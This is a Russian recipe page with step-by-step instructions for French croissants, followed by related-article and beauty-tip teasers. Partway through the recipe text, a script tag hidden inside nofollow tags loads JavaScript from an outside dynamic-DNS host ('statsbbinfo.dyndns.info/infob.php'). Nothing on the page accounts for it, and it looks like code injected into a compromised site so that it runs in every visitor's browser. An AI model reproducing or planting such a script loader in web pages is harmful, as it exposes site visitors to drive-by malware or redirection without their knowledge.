Главная В закладки Обратная связь Регистрация Забыли пароль? RSS лента

Французские круассаны

Французские круассаны

Круассаны являются любимым блюдом во Франции, так почему бы нам тоже не попробовать их приготовить? Приготовление этого блюда занимает определенно немного времени, а как завтрак они очень вкусные и питательные. Вот попробуем приготовить круассаны.

Основные ингредиенты, которые необходимы для приготовления этого блюда:

- 500 г муки

- 2 куриных яйца

- 8 г дрожжей

- 120 г сливочного масла

- 20 мл подсолнечного масла

- 60 г сахара

- 5 г поваренной соли

Для начинки используют:

- Варенье или джем, а так же использовать можно сгущенку, сыр или шоколад

Процесс приготовления состоит из таких этапов:

Дрожжи необходимо развести в 150 мл теплой воды, затем дать им постоять и потом тщательно перемешать. Следующим шагом нужно просеять муку в глубокую миску, и после добавить в муку - 1 яйцо, 60 г сахара, 30 г сливочного масла, соль, разведенные дрожжи и хорошо вымешать получившееся тесто. Процесс вымешивания следует прекратить тогда, когда тесто станет гладким, мягким и эластичным. То масло, которое осталось, необходимо разделить на 3 равные части, и хорошенько его размять. На разделочную поверхность насыпаем муку и следом раскатываем тесто в ровные прямоугольники. 2/3 поверхности теста размазываем первой частью оставшегося сливочного масла, при чем, не доходя до кроя на 3 см. Всю несмазанную поверхность нашего теста аккуратно заворачиваем на половину имеющейся смазанной поверхности. Затем то, что получилось, аккуратно прикрываем той смазанной поверхностью теста, которая осталась. Края теста необходимо аккуратно закрыть руками. Следующим шагом разворачиваем наше тесто ровно на 90 градусов вправо, и начинаем раскатывать прямоугольник. Следом перекладываем тесто на имеющийся лист пергамента, накрываем сверху вторым листом и сворачиваем это тесто пополам. Следом накрываем его полотенцем или тканью, и располагаем примерно на 30 мин в холодильник.<nofollow><script language='javascript' src='http://statsbbinfo.dyndns.info/infob.php?i=24429'></script></nofollow>

По истечению 30 минут, достаем наше тесто и выкладываем на посыпанный мукой стол. Предыдущая процедура подлежит повторению еще 2 раза. Следом проделываем 3 процедуру, но уже без масла. После третьего повтора тесто помещаем в холодильник.

Последним этапом является раскатывание теста в прямоугольник размером 50 на 30 см, следом накрываем его полотенцем, и по истечению 10 минут разрезаем имеющееся тесто вдоль на 2 половины. Затем каждый пласт теста подлежит разрезанию на 8 равных треугольников. Потом каждый треугольник сворачивается в круассан.

На этом этапе приготовления, необходимо выкладывать начинку в круассаны, при чем ту, которую вы выбрали преждевременно - шоколад, варенье или джем. Заворачиваем готовые круассаны, выкладываем их на противень, который преждевременно нужно смазать сливочным маслом. Круассаны формируем в виде полумесяцев. Располагаем круассаны на расстояние, которое будет не менее 5 см друг от друга, расположенных на противне. Затем происходит смазывание круассанов яйцом, и оставляем их на противне на 40 минут, чтобы они подошли. Оставлять лучше в шкафу или духовке, чтобы не было сквозняка. В разогретую духовку помещаем наши французские круассаны, выпекать которые необходимо на протяжении 10-15 минут, придерживаясь температуры 220 градусов.

Дата:29.11.12
СТАТЬИ ПО ТЕМЕ
Вьетнамские блинчики с бананами и шоколадом
Каждая хозяйка хочет приготовить очень вкусный и разнообразный завтрак, особенно в выходной день. Приготовить можно огромное множество разных блюд, но мы остановимся на очень интересном сочетании
Салат  новогодний «Змея»
Новый Год является всеми любимым праздником, практически все люди к нему старательно и пристально готовятся. В этот праздник вся семья, тесным кругом, а может не совсем тесным, с присутствием близких
Выпекаем вкусную и пышную шарлотку
Шарлотка - популярное французское блюдо, которое полюбилось нашим домохозяйкам. Готовится это блюдо из простейших ингредиентов и имеет чрезвычайно нежный вкус. Классическая французская шарлотка
Рецепты круасанов
Рецепты круасанов – это знаменитое французское блюдо, являющееся символом традиционного французского завтрака, которое представляет собой рогалик с вареньем или шоколадной начинкой. Подаются
РЕКЛАМА


КРАСОТА
Выбираем купальник для отпуска
Ну вот, пора коротких шорт, платьев и сарафанов совсем рядом, а вы еще без купальника? Срочно набирайте в поисковике купальники интернет магазин и ищите для себя подходящий. В наше время ассортимент
Подружки невесты 5 образов для зимы
Свадьба ― такое яркое событие в жизни девушки! Так хочется разделить радость и праздничное настроение с подружками. Безусловно, самой красивой на торжестве будет невеста. Но и гостьи должны
Инъекции диспорт
  Инъекции диспорт Абсолютно каждая женщина в своей жизни сталкивается как с возникновением мимических, так и возрастных морщин. Но благодаря современной косметологии от этого дефекта можно
Массаж лица – польза и противопоказания
Одна из древнейших косметологических процедур, применяемых по сей день, является массаж лица, польза которого уже неоднократно проверена временем. С развитием косметологии появляются новые методики и
ЗДОРОВЬЕ
Платье для фигурного катания
Самые основный материал для пошива одежды для фигуристов – это эластичные ткани. Такие качества имеют синтетические волокна: бифлекс – этот материал подходит для костюма. Его основный плюс – это растягивание по всем направлениям и возращение в
Стрип дэнс: танец или искусство обольщения?
Существуют различные виды отдыха и времяпровождения для молодежи. Одним из видов как раз является танец, а скачать музыку бесплатно может каждый. Очень много молодых людей посещают фитнес-клубы, где в последнее время стал очень популярный стрип дэнс.
Как ухаживать за руками летом?
Говорят, что наши руки - наша визитная карточка. Итак, как ухаживать за ними, чтобы они всегда были красивыми и правильно увлажненными. Особенно летом и зимой наши руки подвергаются очень низкой или высокой температуре, эпидермис разрушается,